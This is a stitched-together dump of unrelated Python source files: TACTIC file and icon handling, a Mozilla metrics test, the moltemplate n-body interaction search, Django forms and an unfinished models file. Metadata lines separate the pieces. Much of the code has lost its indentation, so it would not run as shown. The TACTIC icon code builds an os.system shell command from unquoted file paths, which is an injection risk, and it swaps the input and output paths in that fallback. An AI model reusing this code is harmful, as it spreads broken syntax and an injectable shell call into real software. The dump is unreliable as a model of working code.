get_filesystem_name = staticmethod(get_filesystem_name)
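    # A quick illustration of the mapping above (hypothetical input, strict=True):
    #   File.get_filesystem_name("shot/01|beauty v2.EXR") -> "shot__01__beauty_v2.exr"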
def process_file_path(file_path):
'''makes a file path completely kosher with the file system. Only do it on basename or it would remove the : from C:/'''
return Common.get_filesystem_name(file_path)
process_file_path = staticmethod(process_file_path)
def get_md5(path):
'''get md5 checksum'''
py_exec = Config.get_value("services", "python")
if not py_exec:
py_exec = "python"
if isinstance(path, unicode):
path = path.encode('utf-8')
popen = subprocess.Popen([py_exec, '%s/src/bin/get_md5.py'%Environment.get_install_dir(), path], shell=False, stdout=subprocess.PIPE)
popen.wait()
output = ''
value = popen.communicate()
if value:
output = value[0].strip()
if not output:
err = value[1]
print err
return output
get_md5 = staticmethod(get_md5)
def is_file_group(file_path):
'''returns True if it is a file group'''
return not (file_path.find('#') == -1 and file_path.find('%') == -1)
is_file_group = staticmethod(is_file_group)
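    # e.g. (hypothetical names) "render.####.exr" or "frame.%04d.jpg" count as
    # file groups, while "single_image.jpg" does not.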
class FileAccess(SObject):
SEARCH_TYPE = "sthpw/file_access"
def create(file):
file_code = file.get_code()
file_access = FileAccess(FileAccess.SEARCH_TYPE)
file_access.set_value("file_code", file_code)
security = WebContainer.get_security()
user = security.get_user_name()
file_access.set_value("login", user)
file_access.commit()
return file_access
create = staticmethod(create)
class IconCreator(object):
'''Utility class that creates icons of an image or document in the
same directory as the image'''
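    # Typical usage, a sketch mirroring add_icons() below (the path is hypothetical):
    #   creator = IconCreator("/tmp/frame.jpg")
    #   creator.create_icons()
    #   icon_path, web_path = creator.get_icon_path(), creator.get_web_path()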
def __init__(my, file_path):
my.file_path = file_path
# check if it exists
if not os.path.exists( file_path ):
raise FileException( \
"Error: file [%s] does not exist" % my.file_path )
my.tmp_dir = os.path.dirname(file_path)
my.icon_path = None
my.web_path = None
my.texture_mode = False
my.icon_mode = False
def set_texture_mode(my):
'''texture mode down res is 1/4 size'''
my.texture_mode = True
def set_icon_mode(my):
'''icon mode down res is 1/4 size'''
my.icon_mode = True
def get_icon_path(my):
return my.icon_path
def get_web_path(my):
return my.web_path
def create_icons(my):
my.execute()
def execute(my):
# check file name
file_name = os.path.basename(my.file_path)
ext = File.get_extension(file_name)
type = string.lower(ext)
if type == "pdf":
my._process_pdf( file_name )
elif type in File.NORMAL_EXT:
# skip icon generation for normal or video files
pass
elif type in File.VIDEO_EXT:
try:
my._process_video( file_name )
except IOError, e:
                '''This is an unknown file type. Do nothing and accept it as a
                generic file.'''
print "WARNING: ", e.__str__()
Environment.add_warning("Unknown file type", e.__str__())
else:
# assume it is an image
try:
my._process_image( file_name )
except IOError, e:
                '''This is an unknown file type. Do nothing and accept it as a
                generic file.'''
print "WARNING: ", e.__str__()
Environment.add_warning("Unknown file type", e.__str__())
def _process_pdf(my, file_name):
base, ext = os.path.splitext(file_name)
icon_file_name = base + "_icon.png"
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
if sys.platform == 'darwin':
return
else:
if not Common.which("convert"):
return
try:
my.file_path = my.file_path.encode('utf-8')
import shlex, subprocess
subprocess.call(['convert', '-geometry','80','-raise','2x2','%s[0]'%my.file_path,\
"%s"%tmp_icon_path])
except Exception, e:
print "Error extracting from pdf [%s]" % e
return
# check that it actually got created
if os.path.exists(tmp_icon_path):
my.icon_path = tmp_icon_path
else:
print "Warning: [%s] did not get created from pdf" % tmp_icon_path
def get_web_file_size(my):
from pyasm.prod.biz import ProdSetting
web_file_size = ProdSetting.get_value_by_key('web_file_size')
thumb_size = (640, 480)
if web_file_size:
parts = re.split('[\Wx]+', web_file_size)
thumb_size = (640, 480)
if len(parts) == 2:
try:
thumb_size = (int(parts[0]), int(parts[1]))
except ValueError:
thumb_size = (640, 480)
return thumb_size
def _process_video(my, file_name):
ffmpeg = Common.which("ffmpeg")
if not ffmpeg:
return
thumb_web_size = my.get_web_file_size()
thumb_icon_size = (120, 100)
exts = File.get_extensions(file_name)
base, ext = os.path.splitext(file_name)
icon_file_name = "%s_icon.png" % base
web_file_name = "%s_web.jpg" % base
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
tmp_web_path = "%s/%s" % (my.tmp_dir, web_file_name)
#cmd = '''"%s" -i "%s" -r 1 -ss 00:00:01 -t 1 -s %sx%s -vframes 1 "%s"''' % (ffmpeg, my.file_path, thumb_web_size[0], thumb_web_size[1], tmp_web_path)
#os.system(cmd)
import subprocess
try:
subprocess.call([ffmpeg, '-i', my.file_path, "-y", "-ss", "00:00:01","-t","1",\
"-s","%sx%s"%(thumb_web_size[0], thumb_web_size[1]),"-vframes","1","-f","image2", tmp_web_path])
if os.path.exists(tmp_web_path):
my.web_path = tmp_web_path
else:
my.web_path = None
except Exception, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
pass
try:
subprocess.call([ffmpeg, '-i', my.file_path, "-y", "-ss", "00:00:01","-t","1",\
"-s","%sx%s"%(thumb_icon_size[0], thumb_icon_size[1]),"-vframes","1","-f","image2", tmp_icon_path])
if os.path.exists(tmp_icon_path):
my.icon_path = tmp_icon_path
else:
my.icon_path = None
except Exception, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
pass
def _process_image(my, file_name):
base, ext = os.path.splitext(file_name)
# get all of the extensions
exts = File.get_extensions(file_name)
frame = 0
if len(exts) == 2:
try:
frame = int(exts[0])
base = base.replace(".%s" % exts[0], '' )
except ValueError:
frame = 0
if frame:
icon_file_name = "%s_icon.%s.png" % (base, exts[0])
web_file_name = "%s_web.%s.jpg" % (base, exts[0])
else:
icon_file_name = "%s_icon.png" % base
web_file_name = "%s_web.jpg" % base
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
tmp_web_path = "%s/%s" % (my.tmp_dir, web_file_name)
# create the web image
try:
if my.texture_mode:
my._resize_texture(my.file_path, tmp_web_path, 0.5)
my.web_path = tmp_web_path
# create the icon
thumb_size = (120,100)
try:
my._resize_image(tmp_web_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
elif my.icon_mode: # just icon, no web
# create the icon only
thumb_size = (120,100)
try:
my._resize_image(my.file_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
else:
thumb_size = my.get_web_file_size()
try:
my._resize_image(my.file_path, tmp_web_path, thumb_size)
except TacticException:
my.web_path = None
else:
my.web_path = tmp_web_path
# create the icon
thumb_size = (120,100)
try:
my._resize_image(tmp_web_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
# check icon file size, reset to none if it is empty
# TODO: use finally in Python 2.5
if my.web_path:
web_path_size = os.stat(my.web_path)[stat.ST_SIZE]
if not web_path_size:
my.web_path = None
if my.icon_path:
icon_path_size = os.stat(my.icon_path)[stat.ST_SIZE]
if not icon_path_size:
my.icon_path = None
except IOError, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
my.web_path = None
my.icon_path = None
def _extract_frame(my, large_path, small_path, thumb_size):
pass
def _resize_image(my, large_path, small_path, thumb_size):
try:
large_path = large_path.encode('utf-8')
small_path = small_path.encode('utf-8')
if HAS_IMAGE_MAGICK:
# generate imagemagick command
convert_cmd = []
convert_cmd.append(convert_exe)
# png's and psd's can have multiple layers which need to be flattened to make an accurate thumbnail
if large_path.lower().endswith('png'):
convert_cmd.append('-flatten')
if large_path.lower().endswith('psd'):
large_path += "[0]"
convert_cmd.extend(['-resize','%sx%s'%(thumb_size[0], thumb_size[1])])
# FIXME: needs PIL for this ... should use ImageMagick to find image size
if HAS_PIL:
try:
im = Image.open(large_path)
x,y = im.size
except Exception, e:
print "WARNING: ", e
x = 0
y = 0
if x < y:
# icons become awkward if height is bigger than width
# add white background for more reasonable icons
convert_cmd.extend(['-background','white'])
convert_cmd.extend(['-gravity','center'])
convert_cmd.extend(['-extent','%sx%s'%(thumb_size[0], thumb_size[1])])
convert_cmd.append('%s'%(large_path))
convert_cmd.append('%s'%(small_path))
subprocess.call(convert_cmd)
# if we don't have ImageMagick, use PIL, if installed (in non-mac os systems)
elif HAS_PIL:
# use PIL
# create the thumbnail
im = Image.open(large_path)
try:
im.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
im.seek(0)
im = im.convert('RGB')
x,y = im.size
to_ext = "PNG"
if small_path.lower().endswith('jpg') or small_path.lower().endswith('jpeg'):
to_ext = "JPEG"
if x >= y:
im.thumbnail( (thumb_size[0],10000), Image.ANTIALIAS )
im.save(small_path, to_ext)
else:
#im.thumbnail( (10000,thumb_size[1]), Image.ANTIALIAS )
x,y = im.size
# first resize to match this thumb_size
base_height = thumb_size[1]
h_percent = (base_height/float(y))
base_width = int((float(x) * float(h_percent)))
im = im.resize((base_width, base_height), Image.ANTIALIAS )
# then paste to white image
im2 = Image.new( "RGB", thumb_size, (255,255,255) )
offset = (thumb_size[0]/2) - (im.size[0]/2)
im2.paste(im, (offset,0) )
im2.save(small_path, to_ext)
# if neither IM nor PIL is installed, check if this is a mac system and use sips if so
elif sys.platform == 'darwin':
convert_cmd = ['sips', '--resampleWidth', '%s'%thumb_size[0], '--out', small_path, large_path]
subprocess.call(convert_cmd)
else:
raise TacticException('No image manipulation tool installed')
except Exception, e:
print "Error: ", e
# after these operations, confirm that the icon has been generated
if not os.path.exists(small_path):
raise TacticException('Icon generation failed')
def _resize_texture(my, large_path, small_path, scale):
# create the thumbnail
try:
im = Image.open(large_path)
x,y = im.size
resize = int( float(x) * scale )
im.thumbnail( (resize,10000), Image.ANTIALIAS )
im.save(small_path, "PNG")
except:
if sys.platform == 'darwin':
cmd = "sips --resampleWidth 25%% --out %s %s" \
% (large_path, small_path)
else:
cmd = "convert -resize 25%% %s %s" \
% (large_path, small_path)
os.system(cmd)
if not os.path.exists(small_path):
raise
def add_icons(file_paths):
new_file_paths=[]
new_file_types=[]
for file_path in file_paths:
# create icons and add to the list
creator = IconCreator(file_path)
creator.create_icons()
icon_path = creator.get_icon_path()
new_file_paths.append(icon_path)
new_file_types.append("icon")
web_path = creator.get_web_path()
new_file_paths.append(web_path)
new_file_types.append("web")
return new_file_paths, new_file_types
add_icons = staticmethod(add_icons)
class FileGroup(File):
'''Handles groups of files.
The file paths have the following syntax
<file>.####
Where the number signs indicate padding to be replaced by the file_range
The file_range parameter has the following syntax:
1-12 Means from files 1-12
'''
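    # For example (hypothetical paths): file_path "render.####.exr" with a
    # file_range of "1-3" expands, via expand_paths() below, to
    # render.0001.exr, render.0002.exr and render.0003.exr.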
def check_paths(file_path, file_range):
''' check existence of files. this expects a FileRange object'''
expanded = FileGroup.expand_paths(file_path, file_range)
for expand in expanded:
if not System().exists(expand):
raise FileException("File '%s' does not exist!" % expand)
return expanded
check_paths = staticmethod(check_paths)
def create( file_path, file_range, search_type, search_id, file_type=None ):
expanded = FileGroup.check_paths(file_path, file_range)
file_name = os.path.basename(file_path)
file = File(File.SEARCH_TYPE)
file.set_value("file_name", file_name)
file.set_value("search_type", search_type)
file.set_value("search_id", search_id)
from stat import ST_SIZE
total = 0
        for expanded_path in expanded:
            size = os.stat(expanded_path)[ST_SIZE]
total += size
project = Project.get()
file.set_value("project_code", project.get_code())
file.set_value("st_size", total)
file.set_value("file_range", file_range.get_key())
if file_type:
file.set_value("type", file_type)
file.set_value("base_type", File.BASE_TYPE_SEQ)
file.commit()
return file
create = staticmethod(create)
def expand_paths( file_path, file_range ):
'''expands the file paths, replacing # as specified in the file_range object'''
file_paths = []
# frame_by is not really used here yet
frame_start, frame_end, frame_by = file_range.get_values()
# support %0.4d notation
if file_path.find('#') == -1:
for i in range(frame_start, frame_end+1, frame_by):
expanded = file_path % i
file_paths.append( expanded )
else:
# find out the number of #'s in the path
padding = len( file_path[file_path.index('#'):file_path.rindex('#')] )+1
for i in range(frame_start, frame_end+1, frame_by):
expanded = file_path.replace( '#'*padding, str(i).zfill(padding) )
file_paths.append(expanded)
return file_paths
expand_paths = staticmethod(expand_paths)
def extract_template_and_range(cls, paths):
frame = None
# do we extract a range?
padding = 0
for i in range(12,0,-1):
p = re.compile("(\d{%d,})" % i)
path = paths[0].replace("\\", "/")
basename = os.path.basename(path)
dirname = os.path.dirname(path)
m = p.search(basename)
if m:
frame = m.groups()[0]
padding = len(frame)
break
if not frame:
padding = 4
frame = 'x'*padding
template = basename.replace(frame, '#'*padding)
frange = []
last_frame = None
p = re.compile("(\d{%s})" % padding)
for path in paths:
path = path.replace("\\", "/")
basename = os.path.basename(path)
m = p.search(basename)
if m:
frame = int(m.groups()[0])
else:
frame = 0
# the first one is always added
if last_frame == None:
frange.append(frame)
frange.append('-')
frange.append(frame)
last_frame = frame
continue
# the next ones are not
diff = frame - last_frame
if diff == 1:
frange[-1] = frame
else:
frange.append(frame)
frange.append('-')
frange.append(frame)
last_frame = frame
template = "%s/%s" % (dirname,template)
frange = "".join([str(x) for x in frange])
return template, frange
extract_template_and_range = classmethod(extract_template_and_range)
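    # Sketch of the classmethod above (hypothetical paths):
    #   FileGroup.extract_template_and_range(
    #       ["shots/render.0001.exr", "shots/render.0002.exr", "shots/render.0003.exr"])
    #   returns ("shots/render.####.exr", "1-3")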
class FileRange(object):
def __init__(my, frame_start=1, frame_end=1, frame_by=1):
my.frame_start = frame_start
my.frame_end = frame_end
my.frame_by = frame_by
assert(isinstance(frame_start, (int)))
assert(isinstance(frame_end, (int)))
assert(isinstance(frame_by, (int)))
def get_frame_by(my):
return my.frame_by
def get_frame_start(my):
return my.frame_start
def get_frame_end(my):
return my.frame_end
def set_frame_by(my, frame_by):
assert(isinstance(frame_by, (int)))
my.frame_by = frame_by
def set_duration(my, duration):
my.frame_start = 1
my.frame_end = duration
def get_num_frames(my):
return (my.frame_end - my.frame_start + 1) / my.frame_by
def get_key(my):
return "%s-%s/%s" % (my.frame_start, my.frame_end, my.frame_by)
def get_display(my):
if my.frame_by == 1:
return "%s-%s" % (my.frame_start, my.frame_end)
else:
return my.get_key()
def get_values(my):
return (my.frame_start, my.frame_end, my.frame_by)
# static method
def get(file_range):
''' build a FileRange obj from a string'''
frame_by = 1
if file_range.find("/") != -1:
file_range, frame_by = file_range.split("/")
tmps = file_range.split("-")
if len(tmps) > 2:
raise FileException("Unable to determine file_range [%s]" %file_range)
frame_start, frame_end = tmps[0], tmps[1]
frame_start = int(frame_start)
frame_end = int(frame_end)
frame_by = int(frame_by)
return FileRange(frame_start, frame_end, frame_by)
get = staticmethod(get)
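    # e.g. FileRange.get("1-100/2") builds FileRange(1, 100, 2); get_key() gives
    # back "1-100/2" and FileGroup.expand_paths() would step through 1,3,...,99.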
| southpawtech/TACTIC-DEV | src/pyasm/biz/file.py | Python | epl-1.0 | 34,859 | 0.008721 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at http://mozilla.org/MPL/2.0/.
from atmo.stats.models import Metric
def test_metrics_record(now, one_hour_ago):
Metric.record("metric-key-1")
Metric.record("metric-key-2", 500)
Metric.record("metric-key-3", data={"other-value": "test"})
Metric.record("metric-key-4", created_at=one_hour_ago, data={"other-value-2": 100})
m = Metric.objects.get(key="metric-key-1")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == now
assert m.data is None
m = Metric.objects.get(key="metric-key-2")
assert m.value == 500
assert m.created_at.replace(microsecond=0) == now
assert m.data is None
m = Metric.objects.get(key="metric-key-3")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == now
assert m.data == {"other-value": "test"}
m = Metric.objects.get(key="metric-key-4")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == one_hour_ago
assert m.data == {"other-value-2": 100}
| mozilla/telemetry-analysis-service | tests/test_stats.py | Python | mpl-2.0 | 1,163 | 0.00086 |
#!/usr/bin/env python
# Author: Andrew Jewett (jewett.aij at g mail)
# http://www.chem.ucsb.edu/~sheagroup
# License: 3-clause BSD License (See LICENSE.TXT)
# Copyright (c) 2012, Regents of the University of California
# All rights reserved.
import sys
from nbody_graph_search import *
#from collections import namedtuple
if sys.version < '2.7':
sys.stderr.write('--------------------------------------------------------\n'
'----------------- WARNING: OLD PYTHON VERSION ----------\n'
' This program is untested on your python version ('+sys.version+').\n'
' PLEASE LET ME KNOW IF THIS PROGRAM CRASHES (and upgrade python).\n'
' -Andrew 2013-10-25\n'
'--------------------------------------------------------\n'
'--------------------------------------------------------\n')
from ordereddict import OrderedDict
else:
from collections import OrderedDict
from collections import defaultdict
from ttree_lex import MatchesPattern, MatchesAll, InputError
#import gc
def GenInteractions_int(G_system,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order, #function to sort atoms and bonds
atomtypes_int2str,
bondtypes_int2str,
report_progress = False): #print messages to sys.stderr?
"""
GenInteractions() automatically determines a list of interactions
present in a system of bonded atoms (argument "G_system"),
which satisfy the bond topology present in "g_bond_pattern", and
satisfy the atom and bond type requirements in "typepattern_to_coefftypes".
Whenever a set of atoms in "G_system" are bonded together in a way which
matches "g_bond_pattern", and when the atom and bond types is consistent
with one of the entries in "typepattern_to_coefftypes", the corresponding
list of atoms from G_system is appended to the list of results.
These results (the list of lists of atoms participating in an interaction)
are organized according their corresponding "coefftype", a string
which identifies the type of interaction they obey as explained above.
results are returned as a dictionary using "coefftype" as the lookup key.
Arguments:
-- typepattern_to_coefftypes is a list of 2-tuples --
The first element of the 2-tuple is the "typepattern".
It contains a string describing a list of atom types and bond types.
The typepattern is associated with a "coefftype",
which is the second element of the 2-tuple. This is a string
which identifies the type of interaction between the atoms.
Later on, this string can be used to lookup the force field
    parameters for this interaction elsewhere.
-- Arguments: G_system, g_bond_pattern, atomtypes_int2str, bondtypes_int2str --
G_system stores a list of atoms and bonds, and their attributes in
"Ugraph" format. In this format:
Atom ID numbers are represented by indices into the G_system.verts[] list.
Bond ID numbers are represented by indices into the G_system.edges[] list.
Atom types are represented as integers in the G_system.verts[i].attr list.
Bond types are represented as integers in the G_system.edges[i].attr list.
They are converted into strings using
atomtypes_int2str, and bondtypes_int2str.
g_bond_pattern is a graph which specifies the type of bonding between
the atoms required for a match. It is in Ugraph format (however the
atom and bond types are left blank.)
Atom and bond types are supplied by the user in string format. (These
strings typically encode integers, but could be any string in principle.)
The string-version of the ith atom type is stored in
atomtypes_int2str[ G_system.verts[i].attr ]
The string-version of the ith bond type is stored in
bondtypes_int2str[ G_system.edges[i].attr ]
-- The "canonical_order" argument: --
The search for atoms with a given bond pattern often yields
redundant matches. There is no difference for example
between the angle formed between three consecutively
bonded atoms (named, 1, 2, 3, for example), and the
angle between the same atoms in reverse order (3, 2, 1).
However both triplets of atoms will be returned by the subgraph-
matching algorithm when searching for ALL 3-body interactions.)
To eliminate this redundancy, the caller must supply a "canonical_order"
argument. This is a function which sorts the atoms and bonds in a way
which is consistent with the type of N-body interaction being considered.
The atoms (and bonds) in a candidate match are rearranged by the
canonical_order(). Then the re-ordered list of atom and bond ids is
tested against the list of atom/bond ids in the matches-found-so-far,
before it is added.
"""
if report_progress:
startatomid = 0
sys.stderr.write(' searching for matching bond patterns:\n')
sys.stderr.write(' 0%')
# Figure out which atoms from "G_system" bond together in a way which
# matches the "g_bond_pattern" argument. Organize these matches by
# atom and bond types and store all of the non-redundant ones in
# the "interactions_by_type" variable.
gm = GraphMatcher(G_system, g_bond_pattern)
interactions_by_type = defaultdict(list)
for atombondids in gm.Matches():
# "atombondids" is a tuple.
# atombondids[0] has atomIDs from G_system corresponding to g_bond_pattern
# (These atomID numbers are indices into the G_system.verts[] list.)
# atombondids[1] has bondIDs from G_system corresponding to g_bond_pattern
# (These bondID numbers are indices into the G_system.edges[] list.)
# It's convenient to organize the list of interactions-between-
# atoms in a dictionary indexed by atomtypes and bondtypes.
# (Because many atoms and bonds typically share the same type,
# organizing the results this way makes it faster to check
# whether a given interaction matches a "typepattern" defined
# by the user. We only have to check once for the whole group.)
atombondtypes = \
(tuple([G_system.GetVert(Iv).attr for Iv in atombondids[0]]),
tuple([G_system.GetEdge(Ie).attr for Ie in atombondids[1]]))
interactions_by_type[atombondtypes].append(atombondids)
if report_progress:
# GraphMatcher.Matches() searches for matches in an order
# that selects a different atomid number from G_system,
# starting at 0, and continuing up to the number of atoms (-1)
# in the system (G_system.nv-1), and using this as the first
# atom in the match (ie match[0][0]). This number can be used
# to guess much progress has been made so far.
oldatomid = startatomid
startatomid = atombondids[0][0]
percent_complete = (100 * startatomid) // G_system.GetNumVerts()
# report less often as more progress made
if percent_complete <= 4:
old_pc = (100 * oldatomid) // G_system.GetNumVerts()
if percent_complete > old_pc:
sys.stderr.write(' '+str(percent_complete)+'%')
elif percent_complete <= 8:
pc_d2 = (100 * startatomid) // (2*G_system.GetNumVerts())
oldpc_d2 = (100 * oldatomid) // (2*G_system.GetNumVerts())
if pc_d2 > oldpc_d2:
sys.stderr.write(' '+str(percent_complete)+'%')
elif percent_complete <= 20:
pc_d4 = (100 * startatomid) // (4*G_system.GetNumVerts())
oldpc_d4 = (100 * oldatomid) // (4*G_system.GetNumVerts())
if pc_d4 > oldpc_d4:
sys.stderr.write(' '+str(percent_complete)+'%')
else:
pc_d10 = (100 * startatomid) // (10*G_system.GetNumVerts())
oldpc_d10 = (100 * oldatomid) // (10*G_system.GetNumVerts())
if pc_d10 > oldpc_d10:
sys.stderr.write(' '+str(percent_complete)+'%')
if report_progress:
sys.stderr.write(' 100%\n')
#sys.stderr.write(' ...done\n')
#sys.stderr.write(' Looking up available atom and bond types...')
#coefftype_to_atomids = defaultdict(list)
#abids_to_coefftypes = defaultdict(list)
coefftype_to_atomids = OrderedDict()
abids_to_coefftypes = OrderedDict()
# -------------------- reporting progress -----------------------
if report_progress:
# The next interval of code is not technically necessary, but it makes
# the printed output easier to read by excluding irrelevant interactions
# Now, test each match to see if the atoms and bonds involved match
# any of the type-patterns in the "typepattern_to_coefftypes" argument.
types_atoms_all_str = set([])
types_bonds_all_str = set([])
for typepattern, coefftype in typepattern_to_coefftypes:
for atombondtypes, abidslist in interactions_by_type.items():
for Iv in atombondtypes[0]:
types_atoms_all_str.add(atomtypes_int2str[Iv])
for Ie in atombondtypes[1]:
types_bonds_all_str.add(bondtypes_int2str[Ie])
# ------------------ reporting progress (end) -------------------
count = 0
for typepattern, coefftype in typepattern_to_coefftypes:
# ------------------ reporting progress -----------------------
# The next interval of code is not technically necessary, but it makes
# the printed output easier to read by excluding irrelevant interactions
if report_progress:
# Check to see if the atoms or bonds referred to in typepattern
# are (potentially) satisfied by any of the atoms present in the system.
# If any of the required atoms for this typepattern are not present
# in this system, then skip to the next typepattern.
atoms_available_Iv = [False for Iv in range(0, g_bond_pattern.GetNumVerts())]
for Iv in range(0, g_bond_pattern.GetNumVerts()):
for type_atom_str in types_atoms_all_str:
if MatchesPattern(type_atom_str, typepattern[Iv]):
atoms_available_Iv[Iv] = True
atoms_available = True
for Iv in range(0, g_bond_pattern.GetNumVerts()):
if not atoms_available_Iv[Iv]:
atoms_available = False
bonds_available_Ie = [False for Ie in range(0, g_bond_pattern.GetNumEdges())]
for Ie in range(0, g_bond_pattern.GetNumEdges()):
for type_bond_str in types_bonds_all_str:
if MatchesPattern(type_bond_str,
typepattern[g_bond_pattern.GetNumVerts()+Ie]):
bonds_available_Ie[Ie] = True
bonds_available = True
for Ie in range(0, g_bond_pattern.GetNumEdges()):
if not bonds_available_Ie[Ie]:
bonds_available = False
if atoms_available and bonds_available:
# Explanation:
# (Again) only if ALL of the atoms and bond requirements for
# this type pattern are satisfied by at least SOME of the atoms
# present in the this system, ...THEN print a status message.
# (Because for complex all-atom force-fields, the number of
# possible atom types, and typepatterns far exceeds the number
# of atom types typically present in the system. Otherwise
# hundreds of kB of irrelevant information can be printed.)
sys.stderr.write(' checking '+coefftype+' type requirements:'
#' (atom-types,bond-types) '
'\n '+str(typepattern)+'\n')
# ------------------ reporting progress (end) -------------------
for atombondtypes, abidslist in interactions_by_type.items():
# express atom & bond types in a tuple of the original string format
types_atoms = [atomtypes_int2str[Iv] for Iv in atombondtypes[0]]
types_bonds = [bondtypes_int2str[Ie] for Ie in atombondtypes[1]]
type_strings = types_atoms + types_bonds
# use string comparisons to check for a match with typepattern
if MatchesAll(type_strings, typepattern): #<-see "ttree_lex.py"
for abids in abidslist:
# Re-order the atoms (and bonds) in a "canonical" way.
# Only add new interactions to the list after re-ordering
# them and checking that they have not been added earlier.
# (...well not when using the same coefftype at least.
# This prevents the same triplet of atoms from
# being used to calculate the bond-angle twice:
# once for 1-2-3 and 3-2-1, for example.)
abids = canonical_order(abids)
redundant = False
if abids in abids_to_coefftypes:
coefftypes = abids_to_coefftypes[abids]
if coefftype in coefftypes:
redundant = True
if not redundant:
# (It's too bad python does not
# have an Ordered defaultdict)
if coefftype in coefftype_to_atomids:
coefftype_to_atomids[coefftype].append(abids[0])
else:
coefftype_to_atomids[coefftype]=[abids[0]]
if abids in abids_to_coefftypes:
abids_to_coefftypes[abids].append(coefftype)
else:
abids_to_coefftypes[abids] = [coefftype]
count += 1
if report_progress:
sys.stderr.write(' (found '+
str(count)+' non-redundant matches)\n')
return coefftype_to_atomids
def GenInteractions_str(bond_pairs,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order, #function to sort atoms and bonds
atomids_str,
atomtypes_str,
bondids_str,
bondtypes_str,
report_progress = False): #print messages to sys.stderr?
assert(len(atomids_str) == len(atomtypes_str))
assert(len(bondids_str) == len(bondtypes_str))
# The atomids and atomtypes and bondtypes are strings.
# First we assign a unique integer id to each string.
atomids_str2int = {}
atomtypes_str2int = {}
atomtypes_int2str = []
atomtype_int = 0
for i in range(0, len(atomids_str)):
if atomids_str[i] in atomids_str2int:
raise InputError('Error: multiple atoms have the same id ('+
str(atomids_str[i])+')')
atomids_str2int[atomids_str[i]] = i
#atomtypes_int = len(atomtypes_int)+1
if (not (atomtypes_str[i] in atomtypes_str2int)):
atomtypes_str2int[atomtypes_str[i]] = atomtype_int
atomtypes_int2str.append(atomtypes_str[i])
atomtype_int += 1
#atomtypes_int.append(atomtype_int)
bondids_str2int = {}
bondtypes_str2int = {}
bondtypes_int2str = []
bondtype_int = 0
for i in range(0, len(bondids_str)):
if bondids_str[i] in bondids_str2int:
raise InputError('Error: multiple bonds have the same id ('+
str(bondids_str[i])+')')
bondids_str2int[bondids_str[i]] = i
#bondtype_int = len(bondtypes_int)+1
if (not (bondtypes_str[i] in bondtypes_str2int)):
bondtypes_str2int[bondtypes_str[i]] = bondtype_int
bondtypes_int2str.append(bondtypes_str[i])
bondtype_int += 1
# Now convert "bond_pairs" into the UGraph format
G_system = Ugraph()
for iv in range(0, len(atomtypes_str)):
G_system.AddVertex(iv, atomtypes_str2int[atomtypes_str[iv]])
for ie in range(0, len(bond_pairs)):
atomid1_str = bond_pairs[ie][0]
atomid2_str = bond_pairs[ie][1]
if (atomid1_str not in atomids_str2int):
raise InputError('Error in Bonds Section:\n'
' '+atomid1_str+' is not defined in Atoms section\n')
if (atomid2_str not in atomids_str2int):
raise InputError('Error in Bonds Section:\n'
' '+atomid2_str+' is not defined in Atoms section\n')
G_system.AddEdge(atomids_str2int[atomid1_str],
atomids_str2int[atomid2_str],
bondtypes_str2int[bondtypes_str[ie]])
coefftype_to_atomids_int = GenInteractions_int(G_system,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order,
atomtypes_int2str,
bondtypes_int2str,
report_progress)
coefftype_to_atomids_str = OrderedDict()
for coefftype, atomidss_int in coefftype_to_atomids_int.items():
if report_progress:
sys.stderr.write(' processing coefftype: '+str(coefftype)+'\n')
for atomids_int in atomidss_int:
if coefftype in coefftype_to_atomids_str:
coefftype_to_atomids_str[coefftype].append(
[atomids_str[iv] for iv in atomids_int])
else:
coefftype_to_atomids_str[coefftype] = \
[[atomids_str[iv] for iv in atomids_int]]
#gc.collect()
return coefftype_to_atomids_str
| lkostler/AME60649_project_final | moltemplate/moltemplate/src/nbody_by_type_lib.py | Python | bsd-3-clause | 18,422 | 0.0057 |
def generate_documentation():
print("generate_documentation Stub")
return True
| rorychatt/GPCook | gpcook/modules/documentation.py | Python | mit | 88 | 0 |
from django import forms
from django.core.exceptions import ValidationError
from projects.models import Project
class CreateProjectForm(forms.ModelForm):
def __init__(self, user, *args, **kwargs):
self.user = user
super(CreateProjectForm, self).__init__(*args, **kwargs)
def clean_name(self):
return self.cleaned_data['name'].strip()
def clean_code(self):
code = self.cleaned_data['code'].strip().lower().replace(' ', '_')
if Project.objects.filter(user=self.user, code=code).exists():
raise ValidationError('A project with this code already exists')
return code
class Meta:
model = Project
fields = ['name', 'code', 'public']
class CreateProjectFormBasic(forms.Form):
name = forms.CharField(label='Name', max_length=255)
code = forms.SlugField(label='Code', max_length=255)
def clean_name(self):
return self.cleaned_data['name'].strip()
def clean_code(self):
return self.cleaned_data['code'].strip().lower().replace(' ', '_')
| michel-cf/Propeller-WebIDE | projects/forms.py | Python | lgpl-3.0 | 1,061 | 0 |
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from usuarios.models import Usuario
class Sistema(models.Model):
sigla = models.CharField(verbose_name=_('Sigla'), max_length=10)
nome = models.CharField(verbose_name=_('Nome Sistema'),
max_length=100)
descricao = models.TextField(null=True,
blank=True,
verbose_name=_('Descrição'))
class Meta:
verbose_name = _('Sistema')
verbose_name_plural = _('Sistemas')
def __str__(self):
return "%s - %s" % (self.sigla, self.nome)
class Solicitacao(models.Model):
codigo = models.PositiveIntegerField(unique=True)
usuario = models.ForeignKey(Usuario)
sistema = models.ForeignKey(Sistema)
titulo = models.CharField(verbose_name=_('Título'), max_length=100)
